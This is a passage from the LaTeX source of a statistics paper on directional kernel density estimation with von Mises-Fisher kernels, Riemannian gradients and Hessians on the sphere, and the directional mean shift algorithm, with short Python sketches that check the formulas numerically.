f_{\text{vMF}}(\bm{x};\bm{\mu},\nu) = C_q(\nu) \cdot \exp(\nu \bm{\mu}^T \bm{x}) \quad \text{ with } \quad C_q(\nu) = \frac{\nu^{\frac{q-1}{2}}}{(2\pi)^{\frac{q+1}{2}} \mathcal{I}_{\frac{q-1}{2}}(\nu)},
\end{equation}
where $\bm{\mu} \in \Omega_q$ is the directional mean, $\nu \geq 0$ is the concentration parameter, and
$$\mathcal{I}_{\alpha}(\nu) = \frac{\left(\frac{\nu}{2} \right)^{\alpha}}{\pi^{\frac{1}{2}} \Gamma\left(\alpha +\frac{1}{2} \right)} \int_{-1}^1 (1-t^2)^{\alpha -\frac{1}{2}} \cdot e^{\nu t} dt$$
is the modified Bessel function of the first kind of order $\alpha$. See Figure~\ref{fig:vMF_density} for contour plots of a von Mises-Fisher density and a mixture of von Mises-Fisher densities on $\Omega_2$, respectively.
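For $q=2$, the relevant order is $\alpha=\frac{1}{2}$, and the integral representation above reduces to the elementary closed form $\mathcal{I}_{1/2}(\nu)=\sqrt{2/(\pi\nu)}\,\sinh\nu$, whence $C_2(\nu)=\frac{\nu}{4\pi\sinh\nu}$. The sketch below (an illustrative trapezoidal quadrature; the step count is arbitrary) checks both identities numerically:

```python
import math

def bessel_I(alpha, nu, m=20000):
    # modified Bessel function of the first kind via the integral
    # representation in the text (composite trapezoidal rule on [-1, 1]);
    # valid here for alpha >= 1/2, where the integrand is bounded
    pref = (nu / 2.0) ** alpha / (math.sqrt(math.pi) * math.gamma(alpha + 0.5))
    step = 2.0 / m
    total = 0.0
    for i in range(m + 1):
        t = -1.0 + i * step
        w = 0.5 if i in (0, m) else 1.0
        total += w * (1.0 - t * t) ** (alpha - 0.5) * math.exp(nu * t)
    return pref * step * total

nu = 3.0
closed = math.sqrt(2.0 / (math.pi * nu)) * math.sinh(nu)   # I_{1/2} in closed form
assert abs(bessel_I(0.5, nu) - closed) < 1e-4
# normalizing constant of the vMF density on the 2-sphere (q = 2)
C2 = nu ** 0.5 / ((2.0 * math.pi) ** 1.5 * closed)
assert abs(C2 - nu / (4.0 * math.pi * math.sinh(nu))) < 1e-12
```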
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\begin{subfigure}[t]{.5\textwidth}
\centering
\includegraphics[width=0.9\linewidth]{Figures/vMF_density1.pdf}
\caption{$f_{\text{vMF},2}(\bm{x};\bm{\mu}, \nu)$ with $\bm{\mu}=(0,0,1)$ and $\nu=4.0$}
\end{subfigure}%
\hspace{1em}
\begin{subfigure}[t]{.5\textwidth}
\centering
\includegraphics[width=0.9\linewidth]{Figures/vMF_dst_Mix.pdf}
\caption{$\frac{2}{5}\cdot f_{\text{vMF},2}(\bm{x};\bm{\mu}_1, \nu_1) + \frac{3}{5} \cdot f_{\text{vMF},2}(\bm{x};\bm{\mu}_2, \nu_2)$ \\ with $\bm{\mu}_1=(0,0,1), \bm{\mu}_2=(1,0,0)$,\\ and $\nu_1=\nu_2=5.0$}
\end{subfigure}
\caption{Contour plots of a 2-von Mises-Fisher density and a mixture of 2-vMF densities}
\label{fig:vMF_density}
\end{figure}
Using the von-Mises kernel, the directional KDE in (\ref{Dir_KDE}) becomes a mixture of $q$-von Mises-Fisher densities as follows:
$$\hat{f}_h(\bm{x}) = \frac{1}{n} \sum_{i=1}^n f_{\text{vMF}}\left(\bm{x};\bm{X}_i, \frac{1}{h^2} \right)=\frac{1}{n(2\pi)^{\frac{q+1}{2}} \mathcal{I}_{\frac{q-1}{2}}(1/h^2) h^{q-1}} \sum_{i=1}^n \exp\left(\frac{\bm{x}^T\bm{X}_i}{h^2} \right).$$
For a more detailed discussion of the statistical properties of the von Mises-Fisher distribution and directional KDE, we refer the interested reader to \cite{Mardia2000directional,spherical_EM,pewsey2021recent}.
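Using the elementary form $C_2(\nu)=\nu/(4\pi\sinh\nu)$ on $\Omega_2$, the von Mises kernel estimator takes only a few lines of code. The sketch below (the toy sample, bandwidth, and grid resolution are illustrative choices) verifies that $\hat{f}_h$ integrates to one over the sphere:

```python
import math

def vmf_kde(x, data, h):
    # directional KDE on the 2-sphere with the von Mises kernel L(r) = e^{-r};
    # for q = 2 the normalizing constant is C_2(kappa) = kappa / (4 pi sinh(kappa))
    kappa = 1.0 / h ** 2
    c2 = kappa / (4.0 * math.pi * math.sinh(kappa))
    total = 0.0
    for xi in data:
        total += math.exp(kappa * (x[0] * xi[0] + x[1] * xi[1] + x[2] * xi[2]))
    return c2 * total / len(data)

data = [(1.0, 0.0, 0.0), (0.0, 1.0, 0.0), (0.0, 0.0, 1.0)]  # toy sample on Omega_2
h = 0.6

# midpoint rule over spherical coordinates: dA = sin(theta) dtheta dphi
n_th, n_ph = 200, 400
integral = 0.0
for i in range(n_th):
    th = (i + 0.5) * math.pi / n_th
    s, c = math.sin(th), math.cos(th)
    for j in range(n_ph):
        ph = (j + 0.5) * 2.0 * math.pi / n_ph
        xpt = (s * math.cos(ph), s * math.sin(ph), c)
        integral += vmf_kde(xpt, data, h) * s
integral *= (math.pi / n_th) * (2.0 * math.pi / n_ph)
assert abs(integral - 1.0) < 1e-2    # the estimator is a density on the sphere
```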
\subsection{Gradient and Hessian on a Sphere}
\label{Diff_Geo_Review}
For a function defined on a manifold, its gradient and Hessian are defined through the tangent space of the manifold. Whereas the formal definitions of the gradient and Hessian on a general manifold are often involved (see Appendix~\ref{sec::GH}), their representations are simple when the manifold is a (hyper)sphere $\Omega_q$.
Let $T_{\bm x} \equiv T_{\bm x}(\Omega_q)$ be the tangent space of the sphere $\Omega_q$ at point ${\bm x}\in \Omega_q$.
For the sphere $\Omega_q$, the tangent space has a simple representation in the ambient space $\mathbb{R}^{q+1}$ as follows:
\begin{equation}
T_{\bm x} \simeq \left\{\bm{v}\in \mathbb{R}^{q+1}: \bm{x}^T\bm{v}=0 \right\},
\label{tangent_new}
\end{equation}
where $V_1 \simeq V_2$ signifies that the two vector spaces are isomorphic. In what follows, the expression $\bm{v}\in T_{\bm x}$ indicates that $\bm{v}$ is a vector tangent to $\Omega_q$ at $\bm{x}$.
A \emph{geodesic} on $\Omega_q$ is a non-constant, parametrized curve $\gamma: [0,1] \to \Omega_q$ of constant speed and (locally) minimum length between two points on $\Omega_q$. It can be represented by part of a great circle on the sphere $\Omega_q$.
For a smooth function $f: \Omega_q\to \mathbb{R}$, its differential in the (tangent) direction $\bm{v} \in T_{\bm x}$ with $\norm{\bm{v}}_2=1$ at point $\bm{x}\in\Omega_q$ is defined as follows.
We first define a geodesic curve $\alpha: (-\epsilon, \epsilon) \to \Omega_q$ with $\alpha(0)=\bm{x}$ and $\alpha'(0)=\bm{v}$.
Then the differential (at $\bm x$) $df_{\bm{x}}:T_{\bm x}\rightarrow \mathbb{R}$
is given by
\begin{equation}
df_{\bm{x}}(\bm{v}) = \frac{d}{dt} f(\alpha(t)) \Big|_{t=0}.
\label{differential}
\end{equation}
With this, the \emph{Riemannian gradient} $\mathtt{grad}\, f(\bm x)\in T_{\bm x}\subset \mathbb{R}^{q+1}$ is defined as
\begin{equation}
df_{\bm{x}}(\bm{v}) =\langle \mathtt{grad}\, f(\bm x), \bm{v}\rangle= \bm v^T \mathtt{grad}\, f(\bm x).
\label{grad_new}
\end{equation}
The Riemannian Hessian $\mathcal{H} f(\bm x)\in T_{\bm x} \times T_{\bm x}$ is the second derivative of $f$ within the tangent space $T_{\bm x}$. We characterize its matrix representation as follows.
Let ${\bm v},{\bm u}\in T_{\bm x}\subset\mathbb{R}^{q+1}$ be two unit vectors inside the tangent space $T_{\bm x}$.
We consider two geodesic curves
$\alpha,\beta : (-\epsilon, \epsilon) \to \Omega_q$ with $\alpha(0) = \beta(0)=\bm{x}$ and $\alpha'(0)=\bm{v}$ and $\beta'(0) = {\bm u}$.
We define a second-order differential as
$$d^2f_{\bm{x}}(\bm{v}, \bm{u}) = \frac{d}{dt} df_{\beta(t)}\left(\alpha'(t) \right)\Big|_{t=0}$$
and the \emph{Riemannian Hessian} $\mathcal{H} f(\bm x)$ is a $(q+1)\times (q+1)$ matrix satisfying
\begin{equation}
d^2f_{\bm{x}}(\bm{v}, \bm{u}) = \langle\mathtt{grad}\, \langle \mathtt{grad}\, f, \bm{v}\rangle(\bm x) , \bm{u}\rangle= \bm v^T \mathcal{H} f(\bm x) \bm u
\label{hess_new}
\end{equation}
and belongs to $T_{\bm x} \times T_{\bm x}$.
To ensure that $\mathcal{H} f(\bm x)$ belongs to $T_{\bm x} \times T_{\bm x}$,
it has to satisfy
\begin{equation}
\mathcal{H} f(\bm x) = (I_{q+1}-\bm x \bm x^T)\mathcal{H} f(\bm x) = \mathcal{H} f(\bm x) (I_{q+1} - \bm x \bm x^T),
\label{projection}
\end{equation}
where $I_{q+1}$ is the $(q+1)\times (q+1)$ identity matrix and $(I_{q+1}-\bm x \bm x^T)$ is a projection matrix onto the tangent space $T_{\bm x}$.
Note that $d^2f_{\bm{x}}(\bm{v}, \bm{u}) = d^2f_{\bm{x}}(\bm{u}, \bm{v})$ can be easily verified.
Although \eqref{grad_new} and \eqref{hess_new} define the Riemannian gradient and Riemannian Hessian on a sphere,
it is unclear how they are related to the total gradient operator $\nabla$, where $\nabla g(\bm x)\in\mathbb{R}^{q+1}$ and the $\ell$-th component is
$$[\nabla g(\bm x)]_\ell = \frac{d g(\bm x)}{dx_\ell}$$
for any differentiable function $g:\mathbb{R}^{q+1}\rightarrow \mathbb{R}$.
Whereas the total gradient $\nabla$ cannot be applied to a directional density (because it is only supported on $\Omega_q$),
the directional KDE $\hat f_h$ is well-defined outside of $\Omega_q$ (after smoothly extending the domain of the kernel $L$ from $[0,\infty)$ to $\mathbb{R}$), and
its total gradient $\nabla \hat f_h(\bm x) \in\mathbb{R}^{q+1}$ can be defined for any point $\bm x\in \mathbb{R}^{q+1}$.
\begin{figure}
\centering
\includegraphics[width=0.8\linewidth]{Figures/grad_sphe2.pdf}
\caption{Visualization of a differential of the directional density $f$ on the unit sphere and its gradient}
\label{fig:grad_proj}
\end{figure}
To associate the total gradient with the Riemannian gradient, we consider the following construction. Assume tentatively that $f$ is well-defined and smooth in $\mathbb{R}^{q+1}\backslash\{\bm 0\}$, not limited to $\Omega_q$.
In this case, $\nabla f(\bm x)$ is well-defined on $\mathbb{R}^{q+1}\backslash\{\bm 0\}$, and all subsequent derivations can also be applied to the directional KDE $\hat f_h$.
For any point $\bm{x} \in \Omega_q$ and unit vector $\bm{v} \in T_{\bm{x}}$, we define a geodesic curve $\alpha: (-\epsilon, \epsilon) \to \Omega_q$ with $\alpha(0)=\bm{x}$ and $\alpha'(0)=\bm{v}$. Then, a differential of $f$ at $\bm{x}\in \Omega_q$ is a linear map characterized by
\begin{equation*}
df_{\bm{x}}(\bm{v}) = \frac{d}{dt} f(\alpha(t)) \Big|_{t=0} = \nabla f(\alpha(t))^T \alpha'(t) \Big|_{t=0} = \nabla f(\bm{x})^T \alpha'(0) = \nabla f(\bm{x})^T \bm{v}
\end{equation*}
for any given $\bm{v} \in T_{\bm{x}}$. Thus, by the definition of the Riemannian gradient in \eqref{grad_new},
$$
df_{\bm{x}}(\bm{v}) = {\bm v}^T \mathtt{grad}\, f({\bm x}) = \nabla f(\bm{x})^T \bm{v} = \mathtt{Tang}\left(\nabla f(\bm{x})\right)^T \bm{v},$$
and we conclude that
\begin{equation}
\mathtt{grad}\, f({\bm x}) \equiv \mathtt{Tang}\left(\nabla f(\bm{x}) \right) = \left(I_{q+1}-\bm{x}\bm{x}^T \right)\nabla f(\bm{x}),
\label{tangent}
\end{equation}
which is the tangent component of the total gradient $\nabla f(\bm{x})$.
That is, the Riemannian gradient is the same as the tangent component of the total gradient.
In addition, we can define the radial component of the total gradient as
\begin{equation}
\mathtt{Rad}(\nabla f(\bm{x})) = \nabla f(\bm{x}) - \mathtt{Tang}\left(\nabla f(\bm{x}) \right) = \bm{x}\bm{x}^T \nabla f(\bm{x}).
\label{radial}
\end{equation}
See Figure~\ref{fig:grad_proj} for a graphical illustration.
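Both components are straightforward to compute. The sketch below illustrates \eqref{tangent} and \eqref{radial} for the smooth test function $f(\bm x)=\exp(\bm\mu^T\bm x)$ (chosen purely for illustration), checking that the two components are orthogonal and sum back to the total gradient:

```python
import math

def tangent_radial(x, grad):
    # split a total gradient at a unit vector x into its tangent and radial
    # parts: Tang = (I - x x^T) grad, Rad = x x^T grad
    proj = sum(a * b for a, b in zip(x, grad))         # x^T grad
    rad = tuple(proj * a for a in x)
    tang = tuple(g - r for g, r in zip(grad, rad))
    return tang, rad

mu = (0.6, 0.0, 0.8)                                   # illustrative parameter
x = (0.0, 0.6, 0.8)                                    # a point on the sphere
fx = math.exp(sum(a * b for a, b in zip(mu, x)))
grad = tuple(m * fx for m in mu)                       # total gradient of exp(mu^T x)
tang, rad = tangent_radial(x, grad)
assert abs(sum(a * b for a, b in zip(tang, x))) < 1e-12            # Tang ⟂ x
assert all(abs(t + r - g) < 1e-12 for t, r, g in zip(tang, rad, grad))
```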
In the same context, we use the fact that $\alpha''(0) = -\bm x$ for the geodesic curve $\alpha$ and deduce that for any unit vector $\bm v\in T_{\bm x}\subset\mathbb{R}^{q+1}$,
\begin{align}
\label{Hess_curve}
\begin{split}
\bm v^T\mathcal{H} f(\bm x) \bm v &= \frac{d^2}{dt^2} f(\alpha(t)) \Big|_{t=0}\\
&= \frac{d}{dt} \left[\nabla f(\alpha(t))^T \alpha'(t) \right]\Big|_{t=0}\\
&\left(= \left[\sum_{i=1}^{q+1} \sum_{j=1}^{q+1} \frac{\partial^2 }{\partial x_i \partial x_j} f(\alpha(t)) \cdot \alpha_i'(t)\alpha_j'(t) + \sum_{i=1}^{q+1} \frac{\partial}{\partial x_i} f(\alpha(t)) \cdot \alpha_i''(t) \right]\Bigg|_{t=0}
\right)\\
&= \alpha'(0)^T \nabla\nabla f(\alpha(0)) \alpha'(0) + \nabla f(\alpha(0))^T \alpha''(0)\\
&= \bm{v}^T \nabla\nabla f(\bm{x}) \bm{v} + \nabla f(\bm{x})^T \alpha''(0)\\
&= \bm{v}^T (\nabla\nabla f(\bm{x}) - \nabla f(\bm{x})^T \bm x I_{q+1}) \bm{v}.
\end{split}
\end{align}
One may conjecture that $\nabla\nabla f(\bm{x}) - \nabla f(\bm{x})^T \bm{x}\, I_{q+1}$ is
the Riemannian Hessian matrix.
However, it does not satisfy the projection condition in Equation \eqref{projection}.
To this end, we select
\begin{equation}
\label{Hess_Dir}
\mathcal{H} f(\bm x) = (I_{q+1} - \bm{x}\bm{x}^T) \left[\nabla\nabla f(\bm{x}) - \nabla f(\bm{x})^T \bm{x} I_{q+1} \right](I_{q+1} - \bm{x}\bm{x}^T).
\end{equation}
One can verify that the Hessian matrix in \eqref{Hess_Dir}
satisfies both \eqref{hess_new} and \eqref{projection};
thus, it characterizes the relationship between the Riemannian Hessian and total gradient operator. More importantly, the Hessian matrix in \eqref{Hess_Dir} is indeed the Riemannian Hessian on $\Omega_q$. Detailed definitions of Riemannian Hessians can be found in Section 2 and 4.2 of \cite{Extrinsic_Look_Riem_Manifold}.
\section{Mean Shift Algorithm with Directional Data}
\label{Sec:MS_Dir}
In this section, we present a detailed derivation of the mean shift algorithm with directional data. Given the directional KDE $\hat{f}_h(\bm{x})$ in \eqref{Dir_KDE}, \cite{vMF_MS2010,MSC_Dir2014} introduced a Lagrangian multiplier to maximize $\hat{f}_h(\bm{x})$ under the constraint $\bm{x}^T\bm{x}=1$ and derived the directional mean shift algorithm. To make a better comparison with the standard mean shift algorithm with Euclidean data, we provide an alternative derivation.
Given a Euclidean KDE of the form $\hat{p}_n(\bm{x}) = \frac{c_{k,d}}{nh^d} \sum\limits_{i=1}^n k\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right)$ with a differentiable kernel profile $k:[0,\infty) \to [0,\infty)$, its (total) gradient has the following decomposition:
\begin{equation}
\label{KDE_grad_Euclidean}
\nabla \hat{p}_n(\bm{x}) = \underbrace{\frac{2c_{k,d}}{nh^{d+2}} \left[\sum_{i=1}^n g\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right) \right]}_{\text{term 1}} \underbrace{\left[\frac{\sum_{i=1}^n \bm{X}_i g\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right)}{\sum_{i=1}^n g\left(\norm{\frac{\bm{x}-\bm{X}_i}{h}}_2^2 \right)} -\bm{x}\right]}_{\text{term 2}},
\end{equation}
where $g(x)=-k'(x)$ is the derivative of the selected kernel profile. As noted by \cite{MS2002}, the first term is proportional to the density estimate at $\bm{x}$ with the ``kernel'' $G(\bm{x})=c_{g,d}\cdot g(\norm{\bm{x}}_2^2)$, and the second term is the so-called \emph{mean shift} vector, which points toward the direction of maximum increase in the density estimator $\hat{p}_n$.
Thus, the standard mean shift algorithm with Euclidean data translates each query point according to the corresponding mean shift vector, which leads to a converging path to a local mode of $\hat{p}_n$ under some conditions \citep{MS2007_pf,MS2015_Gaussian,Ery2016}.
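As a point of reference for the directional case, the Euclidean update can be sketched in a few lines of numpy. The sketch below uses the Gaussian profile $k(r)=e^{-r/2}$, so that $g(r)=-k'(r)$ is proportional to $e^{-r/2}$; the sample, bandwidth, and starting point are purely illustrative.

```python
import numpy as np

def euclidean_mean_shift_step(x, X, h):
    # g-weights with the Gaussian profile k(r) = exp(-r/2),
    # so that g(r) = -k'(r) is proportional to exp(-r/2)
    w = np.exp(-0.5 * np.sum((X - x) ** 2, axis=1) / h ** 2)
    return w @ X / w.sum()  # weighted sample mean = x + mean shift vector

# Toy data: two well-separated clusters; iterating from a point near the
# first cluster converges to (approximately) its center.
rng = np.random.default_rng(0)
X = np.vstack([rng.normal(0.0, 0.1, (50, 2)), rng.normal(3.0, 0.1, (50, 2))])
x = np.array([0.3, -0.2])
for _ in range(100):
    x = euclidean_mean_shift_step(x, X, h=0.5)
```

Each update replaces the query point by the $g$-weighted sample mean, which is exactly the translation by the mean shift vector in \eqref{KDE_grad_Euclidean}.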
The key insight in our derivation of the directional mean shift algorithm is the following alternative representation of the directional KDE as:
\begin{equation}
\label{Dir_KDE2}
\tilde{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{n} \sum_{i=1}^n L\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right),
\end{equation}
given a directional random sample $\bm{X}_1,...,\bm{X}_n \in \Omega_q$. Recall that the original directional KDE in \eqref{Dir_KDE} is $\hat{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{n} \sum\limits_{i=1}^n L\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right). $
Both $\hat f_h$ and $\tilde f_h$ can be defined on any point in $\mathbb{R}^{q+1}\backslash \{\bm 0\}$.
Although $\hat f_h(\bm{x}) \neq \tilde f_h(\bm{x})$ for $\bm{x}\notin \Omega_q$, their function values are identical on the sphere; that is,
\begin{equation}
\hat f_h(\bm{x}) = \tilde f_h(\bm{x}),\quad \forall \bm{x}\in \Omega_q
\label{equiv}
\end{equation}
due to the fact that
$\frac{1}{2}\norm{\bm{x}-\bm{X}_i}_2^2 = 1-\bm{x}^T\bm{X}_i$ for any $\bm{x}\in \Omega_q$.
Since the two directional KDEs are the same on $\Omega_q$,
either of them can be used to express our density estimator.
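The identity behind \eqref{equiv} is easy to check numerically. The snippet below evaluates both forms with the von Mises kernel $L(r)=e^{-r}$, omitting the common constant $c_{h,q}(L)/n$; the sample size and bandwidth are arbitrary.

```python
import numpy as np

rng = np.random.default_rng(1)
X = rng.normal(size=(200, 3))
X /= np.linalg.norm(X, axis=1, keepdims=True)   # a sample on the 2-sphere

h = 0.3

def L(r):            # von Mises kernel; c_{h,q}(L)/n omitted from both forms
    return np.exp(-r)

def f_hat(x):        # the original form (Dir_KDE), up to the common constant
    return L((1.0 - X @ x) / h**2).sum()

def f_tilde(x):      # the alternative form (Dir_KDE2), up to the same constant
    return L(0.5 * np.sum((x - X)**2, axis=1) / h**2).sum()

x_on = np.array([0.0, 0.0, 1.0])                 # a point on the sphere
x_off = 1.5 * x_on                               # a point off the sphere
print(np.isclose(f_hat(x_on), f_tilde(x_on)))    # equal on Omega_q
print(np.isclose(f_hat(x_off), f_tilde(x_off)))  # generally different off it
```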
The power of the expression $\tilde{f}_h$ is that its total gradient has a similar decomposition as the total gradient of the Euclidean KDE (cf. \eqref{KDE_grad_Euclidean}):
\begin{align}
\label{Dir_KDE_grad}
\begin{split}
\nabla \tilde{f}_h(\bm{x}) &= \frac{c_{h,q}(L)}{nh^2} \sum_{i=1}^n (\bm{x} -\bm{X}_i) \cdot L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right) \\
&= \underbrace{\frac{c_{h,q}(L)}{nh^2} \left[\sum_{i=1}^n -L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right) \right]}_{\text{term 1}} \cdot \underbrace{\left[\frac{\sum_{i=1}^n \bm{X}_i \cdot L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)}{\sum_{i=1}^n L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)} -\bm{x}\right]}_{\text{term 2}}.
\end{split}
\end{align}
Similar to the density gradient estimator with Euclidean data (cf. Equation~\eqref{KDE_grad_Euclidean}), the first term of the product in (\ref{Dir_KDE_grad}) can be viewed as a proportional form of the directional density estimate at $\bm{x}$ with ``kernel'' $G(r) = -L'(r)$:
\begin{align}
\label{prod1}
\begin{split}
\tilde{f}_{h,G}(\bm{x}) &= \frac{c_{h,q}(G)}{n} \sum_{i=1}^n -L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right) = \frac{c_{h,q}(G)}{n} \sum_{i=1}^n -L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)
\end{split}
\end{align}
given that $-L'(r)$ is non-negative on $[0,\infty)$. Some commonly used kernel functions, such as the von-Mises kernel $L(r)=e^{-r}$, easily satisfy this condition. The second term of the product in (\ref{Dir_KDE_grad}) is indeed the \emph{directional mean shift} vector
\begin{equation}
\label{mean_shift}
\Xi_h(\bm{x}) =\frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)}{\sum_{i=1}^n L'\left(\frac{1}{2} \norm{\frac{\bm{x} -\bm{X}_i}{h}}_2^2 \right)} -\bm{x}= \frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)}{\sum_{i=1}^n L'\left(\frac{1-\bm{x}^T\bm{X}_i}{h^2} \right)} -\bm{x},
\end{equation}
which is the difference between a weighted sample mean with weights $\frac{L'\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right)}{\sum\limits_{i=1}^n L'\left(\frac{1-\bm{x}^T \bm{X}_i}{h^2} \right)}$, $i=1,...,n$, and $\bm{x}$, the current query point of the directional density estimation. It is worth mentioning that these weights are strictly positive when the von-Mises kernel $L(r)=e^{-r}$ is applied. From Equations (\ref{prod1}) and (\ref{mean_shift}), the total gradient estimator at $\bm{x}$ becomes
$$\nabla \tilde{f}_h(\bm{x}) = \frac{c_{h,q}(L)}{c_{h,q}(G) h^2} \cdot \tilde{f}_{h,G}(\bm{x}) \cdot \Xi_h(\bm{x}),$$
yielding
$$\Xi_h(\bm{x}) = \frac{c_{h,q}(G) h^2}{c_{h,q}(L)} \cdot \frac{\nabla \tilde{f}_h(\bm{x})}{\tilde{f}_{h,G}(\bm{x})}.$$
As is illustrated in \eqref{tangent}, the total gradient of the directional KDE at $\bm{x}$, $\nabla \tilde{f}_h(\bm{x})$, becomes the Riemannian gradient of $\tilde{f}_h(\bm{x})=\hat{f}_h(\bm{x})$ on $\Omega_q$ after being projected onto the tangent space $T_{\bm{x}}$. This suggests that the directional mean shift vector $\Xi_h(\bm{x})$, which is parallel to the total gradient of $\tilde{f}_h$ at $\bm{x}$, points in the direction of maximum increase in the estimated density $\tilde{f}_h$ after being projected onto the tangent space $T_{\bm{x}}$.
However, due to the manifold structure of $\Omega_q$, translating a point $\bm{x} \in \Omega_q$ in the mean shift direction $\Xi_h(\bm{x})$ moves the point off $\Omega_q$.
We thus project the translated point $\bm x+\Xi_h(\bm{x})$ back onto $\Omega_q$ by a simple standardization: $\bm x+\Xi_h(\bm{x}) \mapsto \frac{\bm x+\Xi_h(\bm{x})}{\norm{\bm x+\Xi_h(\bm{x})}_2}$.
In summary, starting at point $\bm x$, the directional mean shift algorithm moves this point to a new location $\frac{\bm x+\Xi_h(\bm{x})}{\norm{\bm x+\Xi_h(\bm{x})}_2}$.
This movement creates a path leading to a local mode of the estimated directional density under suitable conditions (Theorems \ref{MS_asc} and \ref{MS_conv}).
\begin{algorithm}[t]
\caption{Mean Shift Algorithm with Directional Data}
\label{Algo:MS}
\begin{algorithmic}
\State \textbf{Input}:
\begin{itemize}
\item Directional data sample $\bm{X}_1,...,\bm{X}_n \sim f(\bm{x})$ on $\Omega_q$.
\item The smoothing bandwidth $h$.
\item An initial point $\hat{\bm{y}}_0 \in \Omega_q$ and the precision threshold $\epsilon >0$.
\end{itemize}
\While {$1- \hat{\bm{y}}_{s+1}^T \hat{\bm{y}}_s > \epsilon$}
\State
\begin{equation}
\hat{\bm{y}}_{s+1} = -\frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}_2}
\label{fix_point_eq}
\end{equation}
\EndWhile
\State \textbf{Output}: A candidate local mode of directional KDE, $\hat{\bm{y}}_s$.
\end{algorithmic}
\end{algorithm}
We can encapsulate the directional mean shift algorithm into a single fixed-point equation. Let $\left\{\hat{\bm{y}}_s\right\}_{s=0}^{\infty} \subset \Omega_q$ denote the path of successive points defined by the directional mean shift algorithm, where $\hat{\bm{y}}_0$ is the initial point of the iteration. Translating the query point $\hat{\bm{y}}_s$ by the directional mean shift vector \eqref{mean_shift} at step $s$ leads to
$$\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s = \frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}{\sum_{i=1}^n L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}.$$
When $L(r)$ is decreasing, $L'(r)$ is non-positive on $[0,\infty)$ and
$$\norm{\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s}_2 = \frac{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }_2}{\left|\sum_{i=1}^n L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) \right|} = -\frac{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }_2}{\sum_{i=1}^n L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}$$
given that $\sum\limits_{i=1}^n L'\left(\frac{1-\bm{y}_s^T\bm{X}_i}{h^2} \right) \neq 0$. (Here $L'(r)$ can be replaced by subgradients at non-differentiable points of $L$. See also Remark~\ref{Diff_Relax}.) Again, many commonly used kernel functions, such as the von-Mises kernel $L(r)=e^{-r}$, have nonzero derivatives on $[0,\infty)$ and satisfy this mild condition. Therefore,
\begin{equation*}
\hat{\bm{y}}_{s+1} = \frac{\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s}{\norm{\Xi_h\left(\hat{\bm{y}}_s \right) + \hat{\bm{y}}_s}_2} = -\frac{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right) }{\norm{\sum_{i=1}^n \bm{X}_i L'\left(\frac{1-\hat{\bm{y}}_s^T\bm{X}_i}{h^2} \right)}_2}
\end{equation*}
is the resulting fixed-point equation for $s=0,1,...$, whose right-hand side is a standardized weighted sample mean at $\hat{\bm{y}}_s$ computed with ``kernel'' $G(r)=-L'(r)$. The entire mean shift algorithm with directional data is summarized in Algorithm \ref{Algo:MS} (see also Figure~\ref{fig:MS_One_Step} for a graphical illustration).
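For concreteness, the fixed-point iteration \eqref{fix_point_eq} can be sketched as follows with the von Mises kernel $L(r)=e^{-r}$, for which $-L'(r)=e^{-r}>0$ so the denominator condition holds automatically; the toy data, bandwidth, and tolerances are illustrative. Note that the normalizing constant $c_{h,q}(L)$ never appears.

```python
import numpy as np

def directional_mean_shift(X, h, y0, eps=1e-8, max_iter=500):
    """One run of Algorithm 1 with the von Mises kernel L(r) = exp(-r).
    Any constant multiple of L yields the same iterates, so the
    normalizing constant c_{h,q}(L) is never needed."""
    y = y0 / np.linalg.norm(y0)
    for _ in range(max_iter):
        w = np.exp((X @ y - 1.0) / h**2)   # -L'((1 - y^T X_i)/h^2) > 0
        y_new = w @ X
        y_new /= np.linalg.norm(y_new)     # project back onto the sphere
        if 1.0 - y_new @ y <= eps:         # stopping rule of Algorithm 1
            return y_new
        y = y_new
    return y

# Toy run: noisy samples around the north pole; the iteration should
# terminate near (0, 0, 1).
rng = np.random.default_rng(2)
Z = rng.normal(size=(300, 3)) * 0.15 + np.array([0.0, 0.0, 1.0])
X = Z / np.linalg.norm(Z, axis=1, keepdims=True)
mode = directional_mean_shift(X, h=0.3, y0=X[0])
```

In practice the iteration is run from every sample point (or a mesh of initial points) and the terminal points are grouped to identify distinct local modes.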
\begin{figure}
\centering
